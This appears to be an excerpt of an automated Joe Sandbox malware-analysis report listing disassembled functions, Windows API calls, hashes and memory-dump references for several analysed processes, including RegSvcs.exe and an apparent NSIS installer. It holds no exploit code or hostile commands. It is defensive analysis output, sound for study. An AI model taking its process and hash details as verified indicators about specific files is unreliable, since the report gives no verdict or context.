Instruction Fuzzy Hash: 8C0171B16007099FD314DFADD89585AB3E8AF442107154E7DE5AAD7694EA71F8008B60

Uniqueness

Uniqueness Score: -1.00%

Function 6F885160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F885173

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F88519E

Strings

vector<T> too long, xrefs: 6F88516E

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 360b5ff1914eb52177422e45a644244a1953bdf073482bb66df1e7c5ce7ddbc4
Instruction ID: e7036109981c3aa75489f845deeda65e1cd6d710de0faead3d784153edefc381
Opcode Fuzzy Hash: 360b5ff1914eb52177422e45a644244a1953bdf073482bb66df1e7c5ce7ddbc4
Instruction Fuzzy Hash: 620162B16003099FD728CEACDCA186BB7E9EF546547144D6DE86BCB688E731F900CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DBFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6F8DABC3: __getptd.LIBCMT ref: 6F8DABC9
Part of subcall function 6F8DABC3: __getptd.LIBCMT ref: 6F8DABD9

__getptd.LIBCMT ref: 6F8DBFC3

Part of subcall function 6F8DEAE6: __getptd_noexit.LIBCMT ref: 6F8DEAE9
Part of subcall function 6F8DEAE6: __amsg_exit.LIBCMT ref: 6F8DEAF6

__getptd.LIBCMT ref: 6F8DBFD1

Strings

csm, xrefs: 6F8DBFDF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction ID: 947d6087eaa488f2ac3b51845959af4e286859b820238979a3cecf305b23bdf0
Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction Fuzzy Hash: 9A018734801305AFDF288F65D440AADF3F5BF0A311F604CAEF051AE2A2CB30A982DB41

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E3EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6F8E3ED9
DName::DName.LIBCMT ref: 6F8E3EE5

Strings

{flat}, xrefs: 6F8E3ED4

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 3a951bad95b981f9e736889186b88b72b6e57dbe908b5c1110c39f8c7c10c951
Instruction ID: 373bc6c4719f09d3ad9a39387d842d6f2154076e286b38900b2bfcf1b4d51b87
Opcode Fuzzy Hash: 3a951bad95b981f9e736889186b88b72b6e57dbe908b5c1110c39f8c7c10c951
Instruction Fuzzy Hash: 90F0A071144249AFDB01CF58C452BE83FA09B83395F0484C2E88D0F2A6C731EC42C764

Uniqueness

Uniqueness Score: -1.00%

Function 6F887673 Relevance: 5.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,8E16AAE4), ref: 6F8876AD
LeaveCriticalSection.KERNEL32(?,?,?,8E16AAE4), ref: 6F8876FF
EnterCriticalSection.KERNEL32(8E16AAE4,?,?,?,8E16AAE4), ref: 6F88770D
LeaveCriticalSection.KERNEL32(8E16AAE4,?,00000000,?,?,?,?,8E16AAE4), ref: 6F88772A

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

Part of subcall function 6F886D40: _rand.LIBCMT ref: 6F886DEA

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: 6d13cbae83adbefe5c3463ef3039ade97111dc8862cfbd1535b0f261db9bdd63
Instruction ID: 50559313e7ee3fc86a95623467af16ae8c4a7a5c109afba35f11766a9d4a1b9f
Opcode Fuzzy Hash: 6d13cbae83adbefe5c3463ef3039ade97111dc8862cfbd1535b0f261db9bdd63
Instruction Fuzzy Hash: E5215372504609BFCB10DF58DD44EDBB7BCFF81654F104A66E8269B680EB70AA05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F887680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,8E16AAE4), ref: 6F8876AD
LeaveCriticalSection.KERNEL32(?,?,?,8E16AAE4), ref: 6F8876FF
EnterCriticalSection.KERNEL32(8E16AAE4,?,?,?,8E16AAE4), ref: 6F88770D
LeaveCriticalSection.KERNEL32(8E16AAE4,?,00000000,?,?,?,?,8E16AAE4), ref: 6F88772A

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

Part of subcall function 6F886D40: _rand.LIBCMT ref: 6F886DEA

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: 058840f868f9a3861fc779ed6940f4ff15243b897b1ef71be47e4f5fcce6f26a
Instruction ID: 46efc50dc7b5f3c0518ef15523b06bf809460c9c087c7c73ffd21b258f6c019f
Opcode Fuzzy Hash: 058840f868f9a3861fc779ed6940f4ff15243b897b1ef71be47e4f5fcce6f26a
Instruction Fuzzy Hash: F5216572504609BFCB10DF58DD44EDFB7BCFF81654F104A66E8269B680EB70A905CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F889580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?), ref: 6F8895A9
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6F8895CA
EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6F8895DA
LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6F8895FB

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 1aeca99508f72394ebd6cc492f68e3b587dff94abf4ab037faa2d3bdfe1bcaca
Instruction ID: 5b182db2916431641de3c0939de780c4c481bc71252387321c7758200c1ebe6d
Opcode Fuzzy Hash: 1aeca99508f72394ebd6cc492f68e3b587dff94abf4ab037faa2d3bdfe1bcaca
Instruction Fuzzy Hash: 3F115932A05508EFCB04DE99E980DDEF7B8FF91624B0045DBE5259B610D730EA61CBE0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 6840, Parent PID: 4284COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	4

Executed Functions

Function 02A5DE98 Relevance: 1.7, APIs: 1, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02A5E0FE

Memory Dump Source

Source File: 00000008.00000002.3197049273.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a50000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 24baaddd312061656a8bdbf97e8bef833d28b6c13353f7af5219c6d2958b7299
Instruction ID: 2ef349975b8cdb4d1427416c6afe4cd423dab5af04244f87dd3a8e050241e258
Opcode Fuzzy Hash: 24baaddd312061656a8bdbf97e8bef833d28b6c13353f7af5219c6d2958b7299
Instruction Fuzzy Hash: B7812370A00B558FD724DF29D59079BBBF2FF88304F10892ED8869BA50DB35E949CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A5899D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02A58A59

Memory Dump Source

Source File: 00000008.00000002.3197049273.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a50000_RegSvcs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6fd4642df39eb20d2a86c448fccea5fda2648f170522296aa917cc5a6026ea21
Instruction ID: 072910b1a67d00b5fc78ee7159ee516abb17eb00b9256960cd42cf9cd3029daf
Opcode Fuzzy Hash: 6fd4642df39eb20d2a86c448fccea5fda2648f170522296aa917cc5a6026ea21
Instruction Fuzzy Hash: F441D2B0C00619DEDB24DFA9C88469EBBB5FF49304F24806AE409AB255DB756986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A56EA8 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02A58A59

Memory Dump Source

Source File: 00000008.00000002.3197049273.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a50000_RegSvcs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8d1e5e6c4a4b229d455a000317a0101c5d7bc74a195765eaae8b7f66d7785608
Instruction ID: e606b89b9c3e842620db72523b6cab51301355b9321dee09c254c2aeb03be1df
Opcode Fuzzy Hash: 8d1e5e6c4a4b229d455a000317a0101c5d7bc74a195765eaae8b7f66d7785608
Instruction Fuzzy Hash: 3C41E3B0C00719DFDB24CFA9C94479EBBB5BF49304F24805AE409AB255DB755985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A5DBB8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A5E179,00000800,00000000,00000000), ref: 02A5E38A

Memory Dump Source

Source File: 00000008.00000002.3197049273.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a50000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b1a7924706b46f46a07e68eea16d8adf07acc23fc552147dfb65627f1f3a904f
Instruction ID: 125bed73b17b7426280f59d272a29a154f28da58635956fdb68d26719adb9325
Opcode Fuzzy Hash: b1a7924706b46f46a07e68eea16d8adf07acc23fc552147dfb65627f1f3a904f
Instruction Fuzzy Hash: CC1126B69043589FDB20CF9AC584ADEFBF4EB48324F10846EE919A7210C775A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02A5E318 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A5E179,00000800,00000000,00000000), ref: 02A5E38A

Memory Dump Source

Source File: 00000008.00000002.3197049273.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a50000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e29e833d1af04c46ce6cb9c975ba773f4597f7c4c8796b479750357f1c3c067f
Instruction ID: 7d0995b2688affdff4f4f3a1d11b7d0560033cf7626bab1d7fdbef36a0e0a7f5
Opcode Fuzzy Hash: e29e833d1af04c46ce6cb9c975ba773f4597f7c4c8796b479750357f1c3c067f
Instruction Fuzzy Hash: 771153B6D003498FDB10CFAAC584ADEFBF4FB48324F10846AD819A7210C374A645CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02A5E098 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02A5E0FE

Memory Dump Source

Source File: 00000008.00000002.3197049273.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a50000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e1d817dbdbcfa1a19d36699371946e6834526491b6c0f3e623e249477cecbeb2
Instruction ID: 71b3a97be3ee7c92d1afe0eb0b5928fb6118e53478a0bd93e5fb6b557e75e95e
Opcode Fuzzy Hash: e1d817dbdbcfa1a19d36699371946e6834526491b6c0f3e623e249477cecbeb2
Instruction Fuzzy Hash: 281110B5C002598FCB14CF9AC544ADFFBF4EF88324F10842AD818A7210D375A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 029FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3193807111.00000000029FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_29fd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b27fa63a952419f8699c6fb2121eabfdcbd488bd36793fcc716c7b06eee9edef
Instruction ID: b0cbec2a7b6d4287535a784f8be2c478c9dd9fa9f9e2b3272954f6e6aaa02bef
Opcode Fuzzy Hash: b27fa63a952419f8699c6fb2121eabfdcbd488bd36793fcc716c7b06eee9edef
Instruction Fuzzy Hash: A82104B1504244DFDB85DF14D9C0B2BBF69FB88328F24C569EA094B25AC336D456CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02A0D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3194824745.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3414e54081c4ba85bec9cc5e3703e253575d1c27e038183b08ed151fd8226250
Instruction ID: 3612d77c37f9639d59102574bc4cc65f026463a5c3920f53946f652c323d8166
Opcode Fuzzy Hash: 3414e54081c4ba85bec9cc5e3703e253575d1c27e038183b08ed151fd8226250
Instruction Fuzzy Hash: 3F21F272604600EFDB14DF54E9C4F26BFA5FB84314F20C569D84E4B296CB3AD847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02A0D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3194824745.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b7a0e947bc8f20ba1de052e5491eca5118df4bef9a4948ca992bf6a798c45f
Instruction ID: c96db257caa68b20b4196f4716e7bf8aa541fc22982fa451699ac48951e4dcd2
Opcode Fuzzy Hash: 43b7a0e947bc8f20ba1de052e5491eca5118df4bef9a4948ca992bf6a798c45f
Instruction Fuzzy Hash: 7021A1765097808FCB02CF24D9D4B15BF71EB46314F28C5DAD8498B6A7C33A940ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 029FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3193807111.00000000029FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_29fd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: a17491b587e5a75e4d49c958edf4d2f401dd1e1926564d6f175e1a9bffd0f292
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 6C11D376504280CFDB56CF14D5C4B16BF71FB84328F24C6A9D9490B65AC336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 3613.exePID: 4420, Parent PID: 2580COMMON

Executed Functions

Function 03CF0AD8 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

8bq, xrefs: 03CF0D1F

Memory Dump Source

Source File: 00000009.00000002.2073378035.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3cf0000_3613.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: d2a8b59c17550ae174c4ca8d2fb355dd6013c62330015599c2b1bf0254854a8d
Instruction ID: 337a0fdf02fcbca0f57d2a095c52d9af0235e5acb2c31a4b6c2911ae64af9b57
Opcode Fuzzy Hash: d2a8b59c17550ae174c4ca8d2fb355dd6013c62330015599c2b1bf0254854a8d
Instruction Fuzzy Hash: 3771F334B006519FCB54DB39D088B29FBA6FF84715F998469D909CB292DF74EC02CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03CF0590 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2073378035.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3cf0000_3613.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b680543d5d73969829b63cd71c5977d3595a0ed4f97b4921b5e27716c85b8157
Instruction ID: fe2725579601480738f842eddb4ead341e902ab93b38bcbd8db8f63b3775d58a
Opcode Fuzzy Hash: b680543d5d73969829b63cd71c5977d3595a0ed4f97b4921b5e27716c85b8157
Instruction Fuzzy Hash: 2981FB3490030ADFCB05DBB5D5905AE7BB2FF45309F5045A8C415AB358DB36AD46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03CF0848 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2073378035.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3cf0000_3613.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145d7b2aa8982395361e0dbef101649fa90bf75d66330ab14157224f3d918f6d
Instruction ID: 4c6e9188cbef1e0c6467dea23244137c4b1dc8ea51cf3a989f9b37cfa2cf4d45
Opcode Fuzzy Hash: 145d7b2aa8982395361e0dbef101649fa90bf75d66330ab14157224f3d918f6d
Instruction Fuzzy Hash: A4710B3490030ADFCB05DF75D6909AE7BB2FB85309F6045A8C4156B358DB3AAD46CF92

Uniqueness

Uniqueness Score: -1.00%

Function 03CF0D60 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2073378035.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3cf0000_3613.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287d7b178b4f4c4558a21f7d3e2dca9adc825b1f1255d480928581bb9a225f8d
Instruction ID: 6bd20026bdfb106d65ee5df080e8a402fc3baa172a280cd6c082f087ede0de1e
Opcode Fuzzy Hash: 287d7b178b4f4c4558a21f7d3e2dca9adc825b1f1255d480928581bb9a225f8d
Instruction Fuzzy Hash: D33104307042A64FCB05DBAD98905BEFFB6EF86714B0841A5D699CB203DA30ED45CBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallSetup8.exePID: 4048, Parent PID: 4420COMMON

Non-executed Functions

Function 00403532 Relevance: 72.2, APIs: 32, Strings: 9, Instructions: 464stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000,?,00000008,0000000A,0000000C), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32(?,~nsu%X.tmp,00000001,00435000,?,00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C), ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,00441800), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

